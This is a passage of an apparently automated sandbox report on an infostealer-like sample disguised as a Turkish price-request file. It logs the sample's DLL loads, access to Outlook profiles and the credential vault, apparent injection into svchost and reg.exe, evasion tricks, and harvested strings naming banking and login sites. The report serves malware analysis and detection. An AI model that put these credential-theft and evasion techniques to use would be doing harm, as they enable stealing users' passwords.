                Source: C:\Windows\SysWOW64\reg.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic file information: File size 1191936 > 1048576
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: reg.pdb source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: reg.pdbGCTL source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182664077.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1341897315.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00194B37 LoadLibraryA,GetProcAddress,0_2_00194B37
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B8945 push ecx; ret 0_2_001B8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419140 pushfd ; retf 2_2_00419143
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414A08 push ss; retf 2_2_00414A0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AB7E push esi; iretd 2_2_0040AB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033E0 push eax; ret 2_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AB83 push esi; iretd 2_2_0040AB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415C43 push esp; ret 2_2_00415DA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414428 push esi; ret 2_2_0041442D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415D49 push esp; ret 2_2_00415DA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401500 push esp; retf D8DFh2_2_00401596
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418D0C push edi; ret 2_2_00418D1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418D13 push edi; ret 2_2_00418D1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411E1B push ds; ret 2_2_00411E23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401E2A pushfd ; ret 2_2_00401E55
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417ED3 push edi; ret 2_2_00417EDF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016E2 push esp; iretd 2_2_004016E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401697 pushfd ; ret 2_2_004016D5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415F6B push edx; ret 2_2_00415F6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0346225F pushad ; ret 4_2_034627F9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034627FA pushad ; ret 4_2_034627F9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034909AD push ecx; mov dword ptr [esp], ecx4_2_034909B6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0346283D push eax; iretd 4_2_03462858
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0346135E push eax; iretd 4_2_03461369
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C39F push ecx; ret 4_2_02C6C3A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C097 push ebx; ret 4_2_02C6C0A3
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C64AF0 push edi; ret 4_2_02C64AFC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5EA38 push ds; ret 4_2_02C5EA40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C62860 push esp; ret 4_2_02C629C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C61625 push ss; retf 4_2_02C6162B
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5779B push esi; iretd 4_2_02C577AA
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_001948D7
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00215376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00215376
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001B3187
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeAPI/Special instruction interceptor: Address: 10A1FF4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D324
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D7E4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D944
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D504
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D544
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D1E4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD31230154
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\reg.exeWindow / User API: threadDelayed 9799Jump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\reg.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252Thread sleep count: 173 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252Thread sleep time: -346000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252Thread sleep count: 9799 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252Thread sleep time: -19598000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392Thread sleep time: -66000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\reg.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_001F445A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC6D1 FindFirstFileW,FindClose,0_2_001FC6D1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_001FC75C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FEF95
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FF0F2
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FF3F3
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F37EF
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F3B12
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FBCBC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02C6C640
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001949A0
                Source: r44a7072.4.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: r44a7072.4.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: r44a7072.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: r44a7072.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: r44a7072.4.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: r44a7072.4.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: r44a7072.4.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: r44a7072.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: r44a7072.4.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: r44a7072.4.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3580869515.00000000016D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: r44a7072.4.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: r44a7072.4.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: r44a7072.4.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: firefox.exe, 0000000E.00000002.1572199418.00000125F4DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                Source: r44a7072.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: r44a7072.4.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: r44a7072.4.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: r44a7072.4.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: r44a7072.4.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: r44a7072.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: r44a7072.4.drBinary or memory string: global block list test formVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: r44a7072.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: r44a7072.4.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: discord.comVMware20,11696501413f
                Source: r44a7072.4.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeAPI call chain: ExitProcess graph end nodegraph_0-101097
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417973 LdrLoadDll,2_2_00417973
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00203F09 BlockInput,0_2_00203F09
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00193B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00193B3A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_001C5A7C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00194B37 LoadLibraryA,GetProcAddress,0_2_00194B37
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_010A2260 mov eax, dword ptr fs:[00000030h]0_2_010A2260
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_010A22C0 mov eax, dword ptr fs:[00000030h]0_2_010A22C0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_010A0C50 mov eax, dword ptr fs:[00000030h]0_2_010A0C50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
